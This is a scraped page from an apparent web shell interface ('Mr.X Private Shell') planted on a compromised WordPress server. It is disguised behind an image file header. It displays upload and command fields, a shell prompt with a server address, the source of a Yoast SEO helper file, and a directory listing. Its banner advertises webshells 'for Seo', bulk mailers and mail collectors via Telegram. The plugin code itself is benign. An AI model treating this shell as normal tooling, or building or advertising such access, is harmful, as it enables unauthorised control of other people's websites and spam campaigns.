����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php

namespace Yoast\WP\SEO\Helpers;

/**
 * A helper object for the indexable page.
 */
class Indexables_Page_Helper {

	/**
	 * The default size of the indexable lists.
	 *
	 * @var int
	 */
	const LIST_SIZE = 5;

	/**
	 * The default size of the buffer, in terms of how many times is bigger than the list size.
	 *
	 * @var int
	 */
	const BUFFER_SIZE = 20;

	/**
	 * The default minimum threshold for the amount of posts in the site.
	 *
	 * @var int
	 */
	const POSTS_THRESHOLD = 20;

	/**
	 * The default minimum threshold for the amount of analysed posts in the site, as a fraction of the total posts.
	 *
	 * @var float
	 */
	const ANALYSED_POSTS_THRESHOLD = 0.5;

	/**
	 * The options helper.
	 *
	 * @var Options_Helper
	 */
	private $options;

	/**
	 * Indexables_Page_Helper constructor.
	 *
	 * @param Options_Helper $options The options helper.
	 */
	public function __construct( Options_Helper $options ) {
		$this->options = $options;
	}

	/**
	 * Retrieves the size of the Indexables lists. This size is the amount of indexables that are displayed in each list.
	 *
	 * @return int The size of the Indexables lists.
	 */
	public function get_indexables_list_size() {
		/**
		 * Filter 'wpseo_indexables_list_size' - Allow filtering the size of the Indexables lists.
		 *
		 * @api int The size of the Indexables lists.
		 */
		return \apply_filters( 'wpseo_indexables_list_size', self::LIST_SIZE );
	}

	/**
	 * Retrieves the size of the buffer for the Indexables lists, in terms of how many times bigger it is from the lists' size. This size is the amount of indexables that are fetched upon page load.
	 *
	 * @return int The size of the Indexables lists.
	 */
	public function get_buffer_size() {
		/**
		 * Filter 'wpseo_indexables_buffer_size' - Allow filtering the size of the buffer for the Indexables lists, in terms of how many times bigger it is from the lists' size.
		 *
		 * @api int The size of the buffer for the Indexables lists, in terms of how many times bigger it is from the lists' size.
		 */
		$times = \apply_filters( 'wpseo_indexables_buffer_size', self::BUFFER_SIZE );
		if ( $times < 3 ) {
			$times = 3;
		}

		return ( $this->get_indexables_list_size() * \intval( $times ) );
	}

	/**
	 * Retrieves the minimum threshold for the amount of posts in the site, in order for lists to be relevant.
	 *
	 * @return int The size of the Indexables lists.
	 */
	public function get_minimum_posts_threshold() {
		/**
		 * Filter 'wpseo_posts_threshold' - Allow filtering the minimum threshold for the amount of posts in the site, in order for Indexable lists to be relevant.
		 *
		 * @api int The minimum threshold for the amount of posts in the site, in order for Indexable lists to be relevant.
		 */
		return \apply_filters( 'wpseo_posts_threshold', self::POSTS_THRESHOLD );
	}

	/**
	 * Retrieves the minimum threshold for the amount of analyzed posts in the site, in order for lists to be relevant.
	 *
	 * @return int The size of the Indexables lists.
	 */
	public function get_minimum_analyzed_posts_threshold() {
		/**
		 * Filter 'wpseo_analyzed_posts_threshold' - Allow filtering the minimum threshold for the amount of analyzed posts in the site, in order for Indexable lists to be relevant.
		 *
		 * @api int The minimum threshold for the amount of analyzed posts in the site, in order for Indexable lists to be relevant.
		 */
		return \apply_filters( 'wpseo_analyzed_posts_threshold', self::ANALYSED_POSTS_THRESHOLD );
	}

	/**
	 * Checks if link suggestions are enabled or not
	 *
	 * @return bool Wether enable_link_suggestions is set to true or not.
	 */
	public function get_link_suggestions_enabled() {
		return $this->options->get( 'enable_link_suggestions', false ) === true;
	}

	/**
	 * Returns the list names that are valid.
	 *
	 * @return array An array with valid list names.
	 */
	public function get_list_names() {
		$valid_list_names = [
			'least_readability',
			'least_seo_score',
			'most_linked',
			'least_linked',
		];

		return $valid_list_names;
	}

	/**
	 * Returns the ignore list names that are valid.
	 *
	 * @return array An array with valid ignore list names.
	 */
	public function get_ignore_list_names() {
		$valid_list_names        = $this->get_list_names();
		$valid_ignore_list_names = [];
		foreach ( $valid_list_names as $valid_list_name ) {
			$valid_ignore_list_names[] = $valid_list_name . '_ignore_list';
		}

		return $valid_ignore_list_names;
	}

	/**
	 * Checks if the ignore list name is a valid list name
	 *
	 * @param string $list_name The list name.
	 *
	 * @return bool Wether the list name is valid or not.
	 */
	public function is_valid_ignore_list_name( $list_name ) {
		$valid_list_names = $this->get_ignore_list_names();

		return \in_array( $list_name, $valid_list_names, true );
	}
}

Filemanager

Name Type Size Permission Actions
open-graph Folder 0755
schema Folder 0755
twitter Folder 0755
aioseo-helper.php File 1.24 KB 0644
asset-helper.php File 2.52 KB 0644
author-archive-helper.php File 5.04 KB 0644
blocks-helper.php File 2.32 KB 0644
capability-helper.php File 2.07 KB 0644
curl-helper.php File 655 B 0644
current-page-helper.php File 12.25 KB 0644
date-helper.php File 3.13 KB 0644
environment-helper.php File 793 B 0644
home-url-helper.php File 770 B 0644
image-helper.php File 10.32 KB 0644
import-cursor-helper.php File 1.36 KB 0644
import-helper.php File 716 B 0644
indexable-helper.php File 7.1 KB 0644
indexable-to-postmeta-helper.php File 6.76 KB 0644
indexables-page-helper.php File 4.68 KB 0644
indexing-helper.php File 10.83 KB 0644
input-helper.php File 662 B 0644
language-helper.php File 2.4 KB 0644
meta-helper.php File 2.91 KB 0644
notification-helper.php File 546 B 0644
options-helper.php File 3.87 KB 0644
pagination-helper.php File 3.47 KB 0644
permalink-helper.php File 1.26 KB 0644
post-helper.php File 5.46 KB 0644
post-type-helper.php File 4.24 KB 0644
primary-term-helper.php File 1.37 KB 0644
product-helper.php File 973 B 0644
redirect-helper.php File 1.1 KB 0644
request-helper.php File 352 B 0644
require-file-helper.php File 305 B 0644
robots-helper.php File 1.74 KB 0644
robots-txt-helper.php File 2.66 KB 0644
sanitization-helper.php File 1.03 KB 0644
score-icon-helper.php File 2.2 KB 0644
short-link-helper.php File 3.3 KB 0644
site-helper.php File 566 B 0644
string-helper.php File 1.19 KB 0644
taxonomy-helper.php File 4.46 KB 0644
url-helper.php File 7.32 KB 0644
user-helper.php File 3.67 KB 0644
wincher-helper.php File 2.37 KB 0644
woocommerce-helper.php File 1.28 KB 0644
wordpress-helper.php File 512 B 0644
wordproof-helper.php File 3.01 KB 0644
wpdb-helper.php File 942 B 0644